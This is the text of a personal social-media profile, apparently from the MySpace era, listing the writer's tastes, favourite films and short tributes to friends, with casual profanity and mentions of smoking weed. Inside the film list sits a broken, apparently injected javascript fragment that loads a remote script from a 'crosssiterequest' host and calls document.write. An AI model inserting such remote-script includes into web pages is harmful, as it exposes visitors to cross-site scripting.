I like to smoke weed and cigarettes
I like to hang out with my friends
I HATE it when people say there going to come over and they dont [ALEX]I want a boy friend but I haven't found one worth my time yet
I can be a bitch but I really don't mean to
If you think I hate you just wait a week or two and I'll be over it
I love my friends but sometimes I don't think they even give a shit
I want a lover I don't Have to love
HIp Hop
In that order
Edward Scissor Hands, Fight Club, Nightmare Before Christmas, Beetle Juice lol, Monty Python And The Holy Grail, Monty Python And The Meaning Of Life, DAzed And Confused, Filth And The Furry Sex Pistols, The Crow, Drop Dead Fred, Happy Gilmore, Billy Madison, Gremlins 1 and 2, and lots more.... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("..1...{}");}..
Whatevers on
Aurora Opel shes my girlfriend shes my love my life my partner in various crimes thick and thin we always know where we stand with each other i love everythiing about this girl even the crazy things in her head i can't get over her SHES MY GIRLFRIEND! I LOVE HER MORE THEN LIFE
Nessa what can I say about this girl shes hardcore I go to intelli with her and just whne I thought I was going be a loner there we became friends I don't know what I would do without her
Danielle I never thought we would actualy get close but we did and I am glad shes like a sister we fight and we make jokes but in the end we love each other
STEVEN hahaha wow we used to hate each other but look at us now we don't really hang out anymore but this guy is the one guy that knows when to stop fucking with me unlike all the other guys and to be honest the only reason your on my heros list is because you've saved my life 18973987123791 times when I could not get any weed ha so that makes you cool
Dez I love this guuurl she jacks me lawn gnomes